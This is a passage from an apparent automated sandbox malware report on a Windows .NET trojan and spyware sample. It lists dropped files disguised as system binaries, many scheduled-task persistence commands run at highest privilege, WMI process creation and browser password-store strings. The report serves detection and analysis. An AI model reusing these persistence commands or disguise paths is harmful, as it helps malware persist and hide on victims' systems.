00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMPJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 0_2_00007FFD9B880D800_2_00007FFD9B880D80
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 23_2_00007FFD9B8A0D8023_2_00007FFD9B8A0D80
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8D1CC125_2_00007FFD9B8D1CC1
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8B000025_2_00007FFD9B8B0000
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 25_2_00007FFD9B8A0D8025_2_00007FFD9B8A0D80
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B890D8027_2_00007FFD9B890D80
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B8C1CC127_2_00007FFD9B8C1CC1
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 27_2_00007FFD9B8A000027_2_00007FFD9B8A0000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 28_2_00007FFD9B890D8028_2_00007FFD9B890D80
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B870D8030_2_00007FFD9B870D80
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B8A1CC130_2_00007FFD9B8A1CC1
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 30_2_00007FFD9B88000030_2_00007FFD9B880000
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B8C1CC131_2_00007FFD9B8C1CC1
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B890D8031_2_00007FFD9B890D80
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 31_2_00007FFD9B8A000031_2_00007FFD9B8A0000
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 32_2_00007FFD9B8D1CC132_2_00007FFD9B8D1CC1
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 32_2_00007FFD9B8B000032_2_00007FFD9B8B0000
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 32_2_00007FFD9B8A0D8032_2_00007FFD9B8A0D80
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 33_2_00007FFD9B870D8033_2_00007FFD9B870D80
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 33_2_00007FFD9B88000033_2_00007FFD9B880000
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 33_2_00007FFD9B8A1CC133_2_00007FFD9B8A1CC1
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 34_2_00007FFD9B8A0D8034_2_00007FFD9B8A0D80
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 34_2_00007FFD9B8B000034_2_00007FFD9B8B0000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 34_2_00007FFD9B8D1CC134_2_00007FFD9B8D1CC1
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 34_2_00007FFD9B962F8C34_2_00007FFD9B962F8C
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 34_2_00007FFD9BC61B4F34_2_00007FFD9BC61B4F
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 37_2_00007FFD9B880D8037_2_00007FFD9B880D80
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 37_2_00007FFD9B89000037_2_00007FFD9B890000
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeCode function: 37_2_00007FFD9B8B1CC137_2_00007FFD9B8B1CC1
                              Source: C:\Recovery\WmiPrvSE.exeCode function: 41_2_00007FFD9B8B0D8041_2_00007FFD9B8B0D80
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeCode function: 42_2_00007FFD9B870D8042_2_00007FFD9B870D80
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 43_2_00007FFD9B8A0D8043_2_00007FFD9B8A0D80
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 43_2_00007FFD9B8B000043_2_00007FFD9B8B0000
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeCode function: 43_2_00007FFD9B8D1CC143_2_00007FFD9B8D1CC1
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AaEpKsEu.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              Source: r6cRyCpdfS.exe, 00000000.00000000.1658974087.00000000006A6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exe, 00000000.00000002.1774235431.000000001C2EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exe, 00000017.00000002.2086427159.00000000028DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exe, 00000017.00000002.2086427159.0000000002862000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exe, 00000019.00000002.2086359499.000000000275B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exe, 0000002B.00000002.2215168855.000000000277B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exe, 0000002B.00000002.2215168855.0000000002702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs r6cRyCpdfS.exe
                              Source: r6cRyCpdfS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: r6cRyCpdfS.exe, DmNaYRejPaLkffETTbT.csCryptographic APIs: 'CreateDecryptor'
                              Source: r6cRyCpdfS.exe, DmNaYRejPaLkffETTbT.csCryptographic APIs: 'CreateDecryptor'
                              Source: r6cRyCpdfS.exe, DmNaYRejPaLkffETTbT.csCryptographic APIs: 'CreateDecryptor'
                              Source: r6cRyCpdfS.exe, DmNaYRejPaLkffETTbT.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/306@1/1
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\XTzlBYHG.logJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-z29Ai5otByR2YyFUw1eS
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\AppData\Local\Temp\aqgoggveJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat"
                              Source: r6cRyCpdfS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: r6cRyCpdfS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: AhadVyVMDZ.34.dr, 2QlfyHDIOj.34.dr, 2bgJOOzfDK.34.dr, EDeQxTgf6W.34.dr, sC6d0vFjaw.34.dr, WvjJjyhG1I.34.dr, LjIuCyWc2F.34.dr, 41dDfi9786.34.dr, dYhCYEfIin.34.dr, TdLHRb2f5L.34.dr, rwAukXeb4t.34.dr, UXTSzvx537.34.dr, USvn8Oy8LL.34.dr, oIojv8kiVg.34.dr, VsyP80HcfO.34.dr, M5dedTdAyM.34.dr, XLzoP3YFzH.34.dr, fXTJa4c9K3.34.dr, xsxgFyTPWg.34.dr, rSp3QwYRcR.34.dr, 2mLeQ59NzL.34.dr, Op2Cboi5JU.34.dr, 4VaOxnltEl.34.dr, HwyX57TT9R.34.dr, bV6e1VKcex.34.dr, yzcz258tW2.34.dr, YwJHpioC9r.34.dr, HtmQeLRe5z.34.dr, U2olc5dD2M.34.dr, Tys7MWLU7H.34.dr, RjbLmaigat.34.dr, b0RLC0pbFi.34.dr, UmPPDT60Hk.34.dr, rIuaqdHyuw.34.dr, 4uPCLnq7AG.34.dr, ivpK5pBsdW.34.dr, WhZzmRmhX0.34.dr, 184rbzf4QA.34.dr, nPi2Q9Ie23.34.dr, pbbRgz1INP.34.dr, AvyXnhTFMr.34.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: r6cRyCpdfS.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile read: C:\Users\user\Desktop\r6cRyCpdfS.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\r6cRyCpdfS.exe "C:\Users\user\Desktop\r6cRyCpdfS.exe"
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FF9.tmp" "c:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMP"
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "r6cRyCpdfSr" /sc MINUTE /mo 7 /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "r6cRyCpdfS" /sc ONLOGON /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "r6cRyCpdfSr" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat"
                              Source: unknownProcess created: C:\Users\user\Desktop\r6cRyCpdfS.exe C:\Users\user\Desktop\r6cRyCpdfS.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Users\user\Desktop\r6cRyCpdfS.exe C:\Users\user\Desktop\r6cRyCpdfS.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Program Files (x86)\jDownloader\smartscreen.exe "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\jDownloader\smartscreen.exe "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                              Source: unknownProcess created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
                              Source: unknownProcess created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\jDownloader\smartscreen.exe "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                              Source: unknownProcess created: C:\Recovery\WmiPrvSE.exe "C:\Recovery\WmiPrvSE.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
